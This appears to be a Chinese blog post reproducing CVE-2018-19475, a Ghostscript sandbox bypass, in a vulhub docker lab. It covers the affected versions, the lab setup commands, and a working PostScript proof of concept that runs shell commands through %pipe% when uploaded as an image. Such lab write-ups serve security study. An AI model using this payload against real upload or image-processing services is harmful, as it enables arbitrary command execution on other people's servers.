🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 🍬 博主介绍
- 一、漏洞编号
- 二、影响范围
- 三、漏洞描述
- 四、环境搭建
- 1、进入CVE-2018-19475环境
- 2、启动CVE-2018-19475环境
- 3、查看CVE-2018-19475环境
- 4、访问CVE-2018-19475环境
- 5、查看CVE-2018-19475漏洞提示信息
- 6、关闭CVE-2018-19475环境
- 五、漏洞复现
- 1、POC
- 2、构造命令执行ls
- 3、上传poc.png
- 4、命令执行成功
- 六、相关资源
一、漏洞编号
CVE-2018-19475
二、影响范围
Ghostscript 9.26之前版本
三、漏洞描述
Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大。以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。在文件上传过程中,有可能会用GhostScript来处理图片。
CVE-2018-19475是CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
四、环境搭建
1、进入CVE-2018-19475环境
cd vulhub/ghostscript/CVE-2018-19475
2、启动CVE-2018-19475环境
docker-compose up -d
3、查看CVE-2018-19475环境
docker-compose ps
4、访问CVE-2018-19475环境
访问ip+端口
http://192.168.233.128:8080/
5、查看CVE-2018-19475漏洞提示信息
cat README.md
6、关闭CVE-2018-19475环境
复现完记得关闭环境
docker-compose down
五、漏洞复现
1、POC
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%命令 > /tmp/success && cat /tmp/success) (w) file
2、构造命令执行ls
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%ls > /tmp/success && cat /tmp/success) (w) file
3、上传poc.png
4、命令执行成功
回显出ls信息,命令执行成功。
六、相关资源
1、docker 搭建 vulhub 靶场环境
2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本(含漏洞复现文章连接)
3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)